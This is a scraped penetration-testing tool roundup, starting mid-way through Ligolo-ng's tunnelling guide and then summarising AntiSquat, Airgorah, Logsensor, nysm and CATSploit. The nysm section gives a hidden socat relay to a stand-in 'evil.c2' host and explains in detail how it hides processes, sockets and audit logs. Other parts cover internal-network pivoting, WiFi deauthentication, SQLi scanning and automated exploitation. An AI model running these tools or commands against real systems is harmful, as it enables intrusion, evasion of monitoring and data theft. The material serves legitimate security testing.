      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

      Linux:

      $ sudo ip route add 192.168.0.0/24 dev ligolo

      Windows:

      > netsh int ipv4 show interfaces

      Idx MΓ©t MTU Γ‰tat Nom
      --- ---------- ---------- ------------ ---------------------------
      25 5 65535 connected ligolo

      > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

      Start the tunnel on the proxy:

      [Agent : nchatelain@nworkstation] Β» start
      [Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

      You can now access the 192.168.0.0/24 agent network from the proxy server.

      $ nmap 192.168.0.0/24 -v -sV -n
      [...]
      $ rdesktop 192.168.0.123
      [...]

      Agent Binding/Listening

      You can listen to ports on the agent and redirect connections to your control/proxy server.

      In a ligolo session, use the listener_add command.

      The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

      [Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
      INFO[1208] Listener created on remote agent!

      On the proxy:

      $ nc -lvp 4321

      When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

      This is very useful when using reverse tcp/udp payloads.

      You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

      [Agent : nchatelain@nworkstation] Β» listener_list 
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚ Active listeners β”‚
      β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
      β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
      β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
      β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
      β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      [Agent : nchatelain@nworkstation] Β» listener_stop 0
      INFO[1505] Listener closed.

      Demo

      ligolo-ng_demo.mp4

      Does it require Administrator/root access ?

      On the agent side, no! Everything can be performed without administrative access.

      However, on your relay/proxy server, you need to be able to create a tun interface.

      Supported protocols/packets

      • TCP
      • UDP
      • ICMP (echo requests)

      Performance

      You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

      $ iperf3 -c 10.10.0.1 -p 24483
      Connecting to host 10.10.0.1, port 24483
      [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
      [ ID] Interval Transfer Bitrate Retr Cwnd
      [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
      [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
      [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
      [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
      [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
      [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
      [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
      [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
      [ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
      [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
      - - - - - - - - - - - - - - - - - - - - - - - - -
      [ ID] Interval Transfer Bitrate Retr
      [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
      [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

      Caveats

      Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

      When using nmap, you should use --unprivileged or -PE to avoid false positives.

      Todo

      • Implement other ICMP error messages (this will speed up UDP scans) ;
      • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
      • Add mTLS support.

      Credits

      • Nicolas Chatelain <nicolas -at- chatelain.me>


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

      By: Zion3R β€” January 25th 2024 at 11:30


      AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


      How to use

      • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
      • Install all dependencies by typing pip install -r requirements.txt.
      • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
      • Create a file named .openai-key and paste your chatgpt api key in there.
      • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
      • Create a file named β€˜domains.txt’. Type in a line-separated list of domains you’d like to scan.
      • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
      • Run antisquat using python3.8 antisquat.py domains.txt

      Examples:

      Let’s say you’d like to run antisquat on "flipkart.com".

      Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

      AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.

      Test case:

      A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py

      Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

      If you'd like to know more about the tool, make sure to check out our blog.

      Acknowledgements

      To know more about our Attack Surface Management platform, check out NVADR.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

      By: Zion3R β€” January 24th 2024 at 11:30


      Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

      It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

      ⭐ Don't forget to put a star if you like the project!

      Legal

      Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

      Requirements

      This software only works on linux and requires root privileges to run.

      You will also need a wireless network card that supports monitor mode and packet injection.

      Installation

      The installation instructions are available here.

      Usage

      The documentation about the usage of the application is available here.

      License

      This project is released under MIT license.

      Contributing

      If you have any question about the usage of the application, do not hesitate to open a discussion

      If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

      By: Zion3R β€” January 13th 2024 at 11:30


      A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

      Features

      • login panel Scanning for multiple hosts
      • Proxy compatibility (http, https)
      • Login panel scanning are done in multiprocessing

      so the script is super fast at scanning many urls

      quick tutorial & screenshots are shown at the bottom
      project contribution tips at the bottom

      Β 

      Installation

      git clone https://github.com/Mr-Robert0/Logsensor.git
      cd Logsensor && sudo chmod +x logsensor.py install.sh
      pip install -r requirements.txt
      ./install.sh

      Dependencies

      Β 

      Quick Tutorial

      1. Multiple hosts scanning to detect login panels

      • You can increase the threads (default 30)
      • only run login detector module
      python3 logsensor.py -f <subdomains-list> 
      python3 logsensor.py -f <subdomains-list> -t 50
      python3 logsensor.py -f <subdomains-list> --login

      2. Targeted SQLi form scanning

      • can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module
      • turn on the proxy to see the requests
      • customize user input name of login panel with actual name (default "username")
      python logsensor.py -u www.example.com/login --sqli 
      python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
      python logsensor.py -u www.example.com/login -s --inputname email

      View help

      Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">
      python logsensor.py --help

      usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

      optional arguments:
      -u , --url Target URL (e.g. http://example.com/ )
      -f , --file Select a target hosts list file (e.g. list.txt )
      --proxy Proxy (e.g. http://127.0.0.1:8080)
      -l, --login run only Login panel Detector Module
      -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
      -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
      -t , --threads Number of threads (default 30)
      -h, --help Show this help message and exit

      Screenshots


      Development

      TODO

      1. adding "POST form SQli (Time based) scanning" and check for delay
      2. Fuzzing on Url Paths So as not to miss any login panel


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Nysm - A Stealth Post-Exploitation Container

      By: Zion3R β€” January 9th 2024 at 11:30


      A stealth post-exploitation container.

      Introduction

      With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:

      • bpftool
      • bpflist-bpfcc
      • ps
      • top
      • sockstat
      • ss
      • rkhunter
      • chkrootkit
      • lsof
      • auditd
      • etc...

      All these tools go blind to what goes through nysm. It hides:

      • New eBPF programs
      • New eBPF maps ️
      • New eBPF links ο”—
      • New Auditd generated logs ο“°
      • New PIDs οͺͺ
      • New sockets ο”Œ

      Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.

      Β 

      Installation

      Requirements

      sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

      Linux headers

      cd ./nysm/src/
      bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

      Build

      cd ./nysm/src/
      make

      Usage

      nysm is a simple program to run before the intended command:

      Usage: nysm [OPTION...] COMMAND
      Stealth eBPF container.

      -d, --detach Run COMMAND in background
      -r, --rm Self destruct after execution
      -v, --verbose Produce verbose output
      -h, --help Display this help
      --usage Display a short usage message

      Examples

      Run a hidden bash:

      ./nysm bash

      Run a hidden ssh and remove ./nysm:

      ./nysm -r ssh user@domain

      Run a hidden socat as a daemon and remove ./nysm:

      ./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

      How it works

      In general

      As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

      To differentiate nysm events from the others, everything runs inside a seperated PID namespace.

      Hide eBPF objects

      bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

      As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

      To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

      In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

      Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

      Hide Auditd logs

      Auditd receives its logs from recvfrom() which stores its messages in a buffer.

      If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header by 0.

      Hide PIDS

      Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

      As getdents64() requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.

      Hide sockets

      Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer and the returned value is the length of all these messages combined.

      Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

      These are collected from the connect() and bind() calls.

      Limitations

      Even with the best effort, nysm still has some limitations.

      • Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

      • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

      • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

      • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

      • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

      Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

      By: Zion3R β€” January 8th 2024 at 11:30


      CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .

      CATSploit automatically performs penetration tests in the following sequence:

      1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

      2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

      3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

      4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.


      Prerequisities

      CATSploit has the following prerequisites:

      • Kali Linux 2023.2a

      Installation

      For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

      Installing CATSploit

      To install the latest version of CATSploit, please use the following commands:

      Cloneing and setup
      $ git clone https://github.com/catsploit/catsploit.git
      $ cd catsploit
      $ git clone https://github.com/catsploit/cats-helper.git
      $ sudo ./setup.sh

      Editing configuration file

      CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

      • DBMS
        • dbname: database name created for CATSploit
        • user: username of PostgreSQL
        • password: password of PostgrSQL
        • host: If you are using a database on a remote host, specify the IP address of the host
      • SCENARIO
        • generator.maxscenarios: Maximum number of scenarios to calculate (*)
      • ATTACKPF
        • msfpassword: password of MSFRPCD
        • openvas.user: username of PostgreSQL
        • openvas.password: password of PostgreSQL
        • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
        • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
      • ATTACKDB
        • attack_db_dir: Path to the folder where AtackSteps are stored

      (*) Adjust the number according to the specs of your machine.

      Usage

      To start the server, execute the following command:

      $ python cats_server.py -c [CONFIG_FILE]

      Next, prepare another console, start the client program, and initiate a connection to the server.

      $ python catsploit.py -s [SOCKET_PATH]

      After successfully connecting to the server and initializing it, the session will start.

         _________  ___________       __      _ __
      / ____/ |/_ __/ ___/____ / /___ (_) /_
      / / / /| | / / \__ \/ __ \/ / __ \/ / __/
      / /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
      \____/_/ |_/_/ /____/ .___/_/\____/_/\__/
      /_/

      [*] Connecting to cats-server
      [*] Done.
      [*] Initializing server
      [*] Done.
      catsploit>

      The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

      usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

      positional arguments:
      {host,scenario,scan,plan,attack,post,reset,help,exit}

      options:
      -h, --help show this help message and exit

      I've posted the commands and options below as well for reference.

      host list:
      show information about the hosts
      usage: host list [-h]
      options:
      -h, --help show this help message and exit

      host detail:
      show more information about one host
      usage: host detail [-h] host_id
      positional arguments:
      host_id ID of the host for which you want to show information
      options:
      -h, --help show this help message and exit

      scenario list:
      show information about the scenarios
      usage: scenario list [-h]
      options:
      -h, --help show this help message and exit

      scenario detail:
      show more information about one scenario
      usage: scenario detail [-h] scenario_id
      positional arguments:
      scenario_id ID of the scenario for which you want to show information
      options:
      -h, --help show this help message and exit

      scan:
      run network-scan and security-scan
      usage: scan [-h] [--port PORT] targe t_host [target_host ...]
      positional arguments:
      target_host IP address to be scanned
      options:
      -h, --help show this help message and exit
      --port PORT ports to be scanned

      plan:
      planning attack scenarios
      usage: plan [-h] src_host_id dst_host_id
      positional arguments:
      src_host_id originating host
      dst_host_id target host
      options:
      -h, --help show this help message and exit

      attack:
      execute attack scenario
      usage: attack [-h] scenario_id
      positional arguments:
      scenario_id ID of the scenario you want to execute

      options:
      -h, --help show this help message and exit

      post find-secret:
      find confidential information files that can be performed on the pwned host
      usage: post find-secret [-h] host_id
      positional arguments:
      host_id ID of the host for which you want to find confidential information
      op tions:
      -h, --help show this help message and exit

      reset:
      reset data on the server
      usage: reset [-h] {system} ...
      positional arguments:
      {system} reset system
      options:
      -h, --help show this help message and exit

      exit:
      exit CATSploit
      usage: exit [-h]
      options:
      -h, --help show this help message and exit

      Examples

      In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

      catsploit> scan 192.168.0.0/24
      Network Scanning ... 100%
      [*] Total 2 hosts were discovered.
      Vulnerability Scanning ... 100%
      [*] Total 14 vulnerabilities were discovered.
      catsploit> host list
      ┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
      ┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
      ┑━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
      β”‚ attacker β”‚ 0.0.0.0 β”‚ kali β”‚ kali 2022.4 β”‚ True β”‚
      β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ β”‚ Linux 3.10 - 4.11 β”‚ False β”‚
      β”‚ h_nhqyfq β”‚ 192.168.0.20 β”‚ β”‚ Microsoft Windows 7 SP1 β”‚ False β”‚
      └──────────┴ β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


      catsploit> host detail h_exbiy6
      ┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
      ┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
      ┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
      β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ ubuntu β”‚ ubuntu 14.04 β”‚ False β”‚
      └──────────┴──────────────┴──────────┴──────────────┴─ β”€β”€β”€β”€β”€β”˜

      [IP address]
      ┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
      ┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
      ┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
      β”‚ 192.168.0.10 β”‚ β”‚ β”‚ β”‚
      └──────────── β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      [Open ports]
      ┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
      ┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
      ┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ ftp β”‚ ProFTPD β”‚ 1.3.5 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ ssh β”‚ OpenSSH β”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ http β”‚ Apache httpd β”‚ 2.4.7 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 445 β”‚ netbios-ssn β”‚ Samba smbd β”‚ 3.X - 4.X β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ ipp β”‚ CUPS β”‚ 1.7 β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      [Vulnerabilities]
      ┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
      ┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
      ┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 0 β”‚ TCP Timestamps Information Disclosure β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ FTP Unencrypted Cleartext Login β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak MAC Algorithm(s) Supported (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Encryption Algorithm(s) Supported (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Host Key Algorithm(s) (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Test HTTP dangerous methods β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β”‚ CVE-2014-3704 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Sensitive File Disclosure (HTTP) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Unprotected Web App / Device Installers (HTTP) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Cleartext Transmission of Sensitive Information via HTTP β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.9.0 XSS Vulnerability β”‚ CVE-2012-6708 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.6.3 XSS Vulnerability β”‚ CVE-2011-4969 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check β”‚ CVE-2011-3730 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-2183 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-6329 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2020-12872 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2011-3389 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2015-0204 β”‚
      └──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───& #9472;β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      [Users]
      ┏━━━━━━━━━━━┳━━━━━━━┓
      ┃ user name ┃ group ┃
      ┑━━━━━━━━━━━╇━━━━━━━┩
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


      catsploit> plan attacker h_exbiy6
      Planning attack scenario...100%
      [*] Done. 15 scenarios was planned.
      [*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
      catsploit> scenario list
      ┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
      ┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
      ┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
      β”‚ 3d3ivc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ 5gnsvh β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ 6nlxyc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 48.32 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ 8jos4z β”‚ 0.0.0.0 β”‚ 192.168.0.1 0 β”‚ 0.7 β”‚ 72.8 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
